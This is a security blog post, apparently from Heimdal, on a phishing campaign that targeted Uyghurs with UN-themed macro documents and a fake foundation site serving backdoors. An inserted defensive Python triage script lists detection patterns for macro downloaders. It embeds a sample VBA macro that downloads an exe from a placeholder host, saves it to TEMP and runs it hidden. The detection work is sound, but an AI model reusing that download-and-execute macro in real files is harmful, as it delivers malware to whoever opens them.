Heimdal

Security researchers have uncovered a new phishing campaign targeting Uyghur Muslims, a Turkic ethnic minority concentrated in Xinjiang, China, using emails that pose as the United Nations and other organizations.

The researchers attribute the activity, with low to medium confidence, to a Chinese-speaking threat actor. Fragments of the code in the malicious macros used in the attacks closely resemble VBA code posted on several Chinese-language forums, and may have been copied directly from there.

These attacks clearly utilize the theme of the UNHRC to trick its targets into downloading malicious malware. We believe that these cyber-attacks are motivated by espionage, with the end-game of the operation being the installation of a backdoor into the computers of high-profile targets in the Uyghur community.

Source

The phishing documents sent to potential victims carry the United Nations Human Rights Council (UNHRC) logo. The “official” document, named UgyhurApplicationList.docx, contains lure text about discussions of human rights violations.

If the victim enables editing (and with it macro execution) when opening the file, the embedded VBA macro checks the PC’s architecture and downloads either a 32-bit or a 64-bit payload.
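The behaviour described above (auto-run on enable, architecture check, staged download, execution) is exactly what a macro triage check should score for. The script below is an added example, not code from the article, from Heimdal or from the researchers: it scans extracted VBA source for those four behaviour families and pulls out embedded URLs. In practice the VBA text would come from a tool such as olevba from the oletools package; here both macro samples are constructed for illustration (they are not the campaign’s macro, and the hosts use the reserved `.invalid` TLD so nothing resolves), and the indicator patterns are my own choice of common primitives.

```python
"""Triage extracted VBA source for a staged, architecture-aware downloader.

Added example: not the article's, Heimdal's or the researchers' code. The two
macro samples below are constructed for illustration only.
"""
import re
from typing import Dict, List

# Behaviour families to look for. Patterns are case-insensitive because VBA
# identifiers are. This indicator list is an assumption (my own selection).
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    # Fires as soon as the victim clicks Enable Content
    "auto-exec": re.compile(r"\b(AutoOpen|Document_Open|Workbook_Open|AutoExec)\b", re.I),
    # Chooses a payload per host architecture (32- vs 64-bit)
    "arch-check": re.compile(r"(#If\s+Win64|PROCESSOR_ARCHITECTURE|Is64BitOperatingSystem|\bWow64\b)", re.I),
    # Fetches or writes a second stage
    "downloader": re.compile(r"(URLDownloadToFile|MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream)", re.I),
    # Launches what was fetched
    "exec": re.compile(r"(\bShell\b|WScript\.Shell|ShellExecute|CreateProcess)", re.I),
}
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)


def extract_urls(vba: str) -> List[str]:
    """Return distinct URLs in order of first appearance."""
    seen, out = set(), []
    for url in URL_RE.findall(vba):
        if url not in seen:
            seen.add(url)
            out.append(url)
    return out


def triage(vba: str) -> dict:
    """Score VBA source: which behaviour families appear, which URLs, and a verdict."""
    hits: Dict[str, List[str]] = {}
    for label, rx in INDICATORS.items():
        found = sorted({m.group(0) for m in rx.finditer(vba)}, key=str.lower)
        if found:
            hits[label] = found
    # A downloader paired with execution or an architecture switch is the
    # staged-loader shape described in the article.
    if "downloader" in hits and ("exec" in hits or "arch-check" in hits):
        verdict = "suspicious"
    elif hits.keys() & {"downloader", "exec", "arch-check"}:
        verdict = "review"
    else:
        verdict = "benign"
    return {"hits": hits, "urls": extract_urls(vba), "verdict": verdict}


# Constructed sample modelled on the behaviour described, NOT the real macro.
SUSPECT_MACRO = r"""
Sub AutoOpen()
    Dim url As String, exePath As String
    If Environ("PROCESSOR_ARCHITECTURE") = "AMD64" Then
        url = "http://stage.example.invalid/OfficeUpdate64.exe"
    Else
        url = "http://stage.example.invalid/OfficeUpdate32.exe"
    End If
    exePath = Environ("TEMP") & "\OfficeUpdate.exe"
    Dim http As Object, stream As Object
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", url, False
    http.send
    Set stream = CreateObject("ADODB.Stream")
    stream.Type = 1
    stream.Open
    stream.Write http.responseBody
    stream.SaveToFile exePath, 2
    Shell exePath, vbHide
End Sub
"""

# Constructed benign sample: formats the document and touches nothing else.
BENIGN_MACRO = r"""
Sub FormatReport()
    Dim rng As Range
    Set rng = ActiveDocument.Content
    rng.Font.Name = "Calibri"
    rng.ParagraphFormat.SpaceAfter = 6
End Sub
"""

if __name__ == "__main__":
    for name, sample in (("suspect", SUSPECT_MACRO), ("benign", BENIGN_MACRO)):
        report = triage(sample)
        print(f"{name}: {report['verdict']}")
        for label, found in report["hits"].items():
            print(f"  {label}: {', '.join(found)}")
        for url in report["urls"]:
            print(f"  url: {url}")
```

The verdict logic deliberately keys on the combination of behaviours rather than any single keyword: a macro that only calls `Shell`, or only reads `PROCESSOR_ARCHITECTURE`, is flagged for review, while the download-then-execute pairing that defines a stager is marked suspicious outright.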

The downloaded file, named “OfficeUpdate.exe,” is a shellcode loader that fetches and loads a remote payload; at the time of the investigation, however, the IP address it contacted was unreachable, so the final payload could not be retrieved.

Nevertheless, the domains connected to the malicious attachment led the investigation to a malware-delivery website impersonating a human rights organization.

The “Turkic Culture and Heritage Foundation” (TCAHF) domain claims to work for “Tukric culture and human rights,” but its copy was lifted from opensocietyfoundations.org, a genuine civil rights organization.

The website, aimed at Uyghurs seeking funding, tries to entice visitors into downloading a “security scanner” before filling in the details required to apply for a grant. The download is in fact a backdoor.

Although only the Windows download link actually delivered the malware, the site also advertised a macOS version.

Two backdoors were identified: WebAssistant, served from May 2020, and TcahfUpdate, served from October 2020. Both establish persistence on the victim’s system, carry out espionage and data theft, and can be used to deliver additional payloads.

The potential victims are believed to be located in China and Pakistan, in areas predominantly inhabited by Uyghurs.

Two further attacker-controlled domains redirect to the website of a Malaysian government body, the “Terengganu Islamic Foundation.”

This suggests that the attackers are pursuing additional targets in countries such as Malaysia and Turkey, although they might still be developing those resources as we have not yet seen any malicious artifacts associated with those domains.

Source

The researchers note that although the group does not appear to share infrastructure with other threat actors, it is probably Chinese-speaking and remains active: new domains were registered this year to the same IP address linked to the earlier attacks.

Author Profile

Antonia Din

PR & Video Content Manager


As a Senior Content Writer and Video Content Creator specializing in cybersecurity, I leverage digital media to unravel and clarify complex cybersecurity concepts and emerging trends. With my extensive knowledge in the field, I create content that engages a diverse audience, from cybersecurity novices to experienced experts. My approach is to create a nexus of understanding, taking technical security topics and transforming them into accessible, relatable knowledge for anyone interested in strengthening their security posture.